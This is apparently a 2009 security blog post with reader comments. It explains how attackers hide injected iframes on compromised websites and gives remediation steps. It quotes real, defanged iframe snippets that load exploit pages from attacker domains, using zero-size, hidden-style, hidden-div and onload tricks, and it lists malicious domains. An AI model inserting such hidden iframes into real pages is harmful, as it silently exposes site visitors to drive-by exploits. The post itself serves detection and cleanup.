msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Evolution of Hidden Iframes

   28 Oct 09   Filed in Website exploits

Injecting hidden malicious iframes into compromised legitimate websites is one of the most popular types of malware attacks. Invisible iframes allow to silently load exploits from “bad” sites while unsuspecting web surfers browsing visible content of infected websites.

Iframes are rectangular elements of webpages where you can load other web pages either from the same site or from some third party site (in other words: webpage inside a webpage). There are many legitimate uses of iframes. The most common is ad blocks (e.g. Google displays AdSense in iframes)

Hiding iframes

It is said that iframes are rectangular elements and they occupy some space on web pages. So how do hackers make them invisible?

Dimension tricks

The easiest trick is to create an iframe with zero-length sides (Warning: in examples I use real code that I found on different infected websites):

<iframe src="hxxp://google-analyz .cn/ count.php?o=1" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

When malware scanners started to search for iframes with zeros in width and height, hackers started to use zero in one dimension only (Area of rectangles with zero in either width or height is still zero – nothing to display).

<iframe src="hxxp://a86x .homeunix .org:8080/ ts/in.cgi?open2" width=997 height=0 style="visibility: hidden"></iframe>

Then, to game scanners that searched for zeros, hackers started to use barely visible iframes. If it occupies only a few pixels on screen it looks like a dot that hard to spot, especially if it is located at the very top or bottom of infected web pages.

<iframe src="hxxp://yourlitetop .cn/ ts/ in.cgi?mozila7" width=2 height=4 style="visibility: hidden"></iframe>

Invisible styles

Another trick is to use the “visibility: hidden” style. With this style, it doesn’t matter what dimensions of an iframe are – it won’t be displayed by a web browser (but its content will be loaded).

<iframe src="hxxp://combinebet .cn:8080/ index.php" width=180 height=141 style="visibility: hidden"></iframe>

Usually this style is combined with dimension tricks. I guess, some browsers may not support this style for iframes. Or hackers are just afraid to be unmasked if CSS is disabled (which is quite rare nowadays).

About a month ago, hackers started to use iframes that contained absolutely no code that made them invisible. Still they wouldn’t display in web browsers. The trick was to place a visible iframe inside an invisible div.

<div style="display:none"><iframe src="hxxp://red-wolf .ru:8080/ index.php" width=574 height=455 ></iframe></div>

New JavaScript onload trick

If you follow me on Twitter, you already know that hackers now use a brand new trick to hide their iframes. What they do is inject iframes that miss both src parameter that tells where to load a page from and any dimension and style parameters that can make iframes invisible.

This time they solely rely on a script specified for the “onload” event of iframes:

<iframe frameborder="0" onload="if (!this.src){ this.src='hxxp://iqmon .ru:8080/ index.php'; this.height='0'; this.width='0';}" >dvexgqoexlsvajdiodgqvxswnifzmxo</iframe>

As you can see, the onload script assigns values to iframe’s src, height and width on the fly when someone loads an infected web page. The iframe is initially blank. Then it executes the script and makes itself hidden, loading a malicious page at the same time. As a side effect, you can notice a flicker when you load infected web pages.

This way hackers try to have their iframes unnoticed by scanners that search for either hidden iframes or iframes from untrusted sources.

Unmask Parasites vs hidden iframes

I should proudly notice that at this point my Unmask Parasites successfully detects all types of hidden iframes reviewed in this post.

Different tricks, the same attack

While all iframes point to different domains and use different hiding techniques, 5 out 6 examples in this post represent the same attack that I regularly review in this blog (you can find links at the bottom of this post).

Hackers steal FTP credentials from computers of web masters and then use them to inject malicious iframes into legitimate web sites (mainly into files with names index.html, home.html, default.html, etc. Extensions of infected files may also vary: .htm, .php, .asp, etc.).

Malicious domain names change every day and it’s hard to keep track of them. In this post I’ll try to list domains that I encounter in the latest “onload” modification of the iframe attack.

lifezilla .ru, iqmon.ru, iqoole.ru, poznatsmert .ru, smertest .ru,
pastanotherlife .ru, lastanotherlife .ru, the-another-life.ru,
theeasyriver .ru, thepreviouslife .ru, testossteron .ru, iqckly .ru,
testodrome .ru, testilla .ru, testoogle .ru, smert-test .ru,
deth-test .ru, whendeath .ru, mozg-testing .ru, iqsp .ru, mozgilla .ru,
ig-testing .ru, intelekt-testing .ru, iq-mozgi .ru, iqie .ru, intelq .ru,
noniq .ru, gooiq .ru, testometr .ru, testoid .ru, iqboom .ru, last-life .ru,
zria .ru, worldrat .ru, newlifeworld .ru, plusbest .ru, superkahn .ru,
letterssite .ru, age-free .ru, siteimps .ru, worldcardtech .ru,
lifedrom .ru, youramps .ru
,

Removing hidden iframes

  1. Remove malware that steals FTP credentials. Thoroughly scan your computers for viruses and spyware.
  2. Once your computer is clean, change all site passwords to prevent reinfection.
  3. Keep new passwords secure. Don’t save them in FTP programs – this is exactly where the malware steals credentials from.
  4. Upload clean files (from a backup) to your site.
  5. If possible, don’t use insecure FTP protocol. Most hosting plans offer secure protocols such as SFTP and FTPS.

Have your say

Do you have anything to add? Did I miss any trick that hackers use to hide iframes?

Your comments are always welcome!

Similar posts:

Reader's Comments (12)

  1. |

    [...] This post was mentioned on Twitter by Denis, Malware Domain List. Malware Domain List said: RT @unmaskparasites [blog] Evolution of Hidden Iframes http://bit.ly/4q4Nab – tricks hackers use to hide malicious iframes [...]

  2. |

    I just today ran into a infected mootools.js that had obfusticated javascript that wrote – what else – an iframe into the document. the destination exploited the browser and then it was off to the races.

    • |

      I’ve removed the link from your code since the script is really malicious.

      Dave,

      Malicious scripts that inject hidden iframes is a whole new story. Much longer story than this one…

  3. |

    I’m sure in your research you also see many different ways of obfuscating iframes as well.

    Care to show some of those methods?

    • |

      Thomas,

      These are probably all main tricks for hiding existing iframes.

      On the other hand, there are so many ways to inject hidden iframes on the fly using scripts, that one could write a book about it.

  4. |

    [...] ———- iFrameインジェクションの進化 Evolution of Hidden Iframes iframeを隠す手段としてよく使われているのが <iframe src="hxxp://gumblar .cn/ [...]

  5. |

    “Malwarebytes’ Anti-Malware”

    People, this software is very nice to prevent your computer!

    Bye!

  6. |

    I didn’t know that I was infected mootools, is tha
    obfuscated JavaScript, but there was an iframe in the document and the destination was exploited.

  7. |

    Are you saying that google analystics is a hacker? what do you mean.

    • |

      “google analystics” is definitely malicious. Every domain that mimics Google Analytics is at least suspicious.

  8. |

    I want you to contact me because these does not make sense. How could someone hack with iframes?